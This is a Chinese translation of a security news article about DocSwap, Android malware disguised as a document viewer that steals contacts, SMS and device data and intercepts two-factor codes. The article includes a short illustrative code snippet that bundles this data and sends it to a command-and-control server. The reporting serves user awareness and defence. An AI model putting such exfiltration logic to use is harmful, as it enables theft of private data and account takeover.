伪装成安全文档查看器的 DocSwap 恶意软件对全球安卓用户发动攻击

阅读量37390

发布时间 : 2025-03-19 14:40:54

x
译文声明

本文是翻译文章,文章原作者 Tushar Subhra Dutta,文章来源:cybersecuritynews

原文地址:https://cybersecuritynews.com/docswap-malware-as-security-document-viewer/

译文仅供参考,具体内容表达以及含义原文为准。

一场名为 “DocSwap” 的复杂恶意软件攻击活动浮出水面,它伪装成一款合法的文档安全与查看应用程序,将全球的Android 用户作为攻击目标。

该恶意软件运用社会工程策略,诱骗用户安装看似是生产力工具的程序,实则在受害者设备上悄然建立持久存在,并窃取敏感信息。

最初的感染通常通过网络钓鱼邮件或受攻击的网站进行,这些邮件和网站将这款假的文档查看器宣传为安全打开 PDF 和办公文件的解决方案。

安装后,DocSwap 会请求广泛的权限,包括访问联系人、存储以及短信功能。

S2W 安全分析师指出,一旦安装,该恶意软件会使用加密协议与命令控制服务器建立连接,以此绕过标准检测方法。他们的分析显示,在过去三周内,亚洲、欧洲和北美的感染数量大幅激增。

该恶意软件采用了复杂的混淆技术来隐藏其恶意代码。当应用程序被打开时,它确实会展示文档查看功能,同时在后台执行其有效载荷,这使得普通用户很难检测到异常。

DocSwap 的核心功能依赖于一个原生库,该库执行以下代码:

private void exfiltrateData() {

String deviceInfo = getDeviceInfo();

String contactsList = getContacts();

String smsData = getMessages();

new AsyncTask() {

@Override

protected Void doInBackground(Void… params) {

sendToC2Server(encryptData(deviceInfo + contactsList + smsData));

return null;

}

}.execute();}

攻击分析

该恶意软件采用多阶段感染过程,起始于一个释放器组件。这个初始有效载荷看似无害,但包含一个加密的有效载荷,该载荷会在预定延迟后解密。

这种技术有助于躲避安全研究人员常用的沙盒分析和动态扫描工具。

对网络流量的分析表明,DocSwap 主要与位于东欧和东南亚的服务器通信,使用一种模仿合法 HTTPS 流量的自定义协议。

DocSwap 最令人担忧的方面是它能够拦截并转发身份验证短信,这可能危及双因素身份验证。

安全专家建议立即卸载任何可疑的文档查看应用程序,并使用可靠的杀毒软件对设备进行全面扫描。用户还应启用谷歌应用商店保护功能,并避免从未知来源安装应用程序。

 

 

本文翻译自cybersecuritynews 原文链接。如若转载请注明出处。
分享到:微信
+12赞
收藏
安全客
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66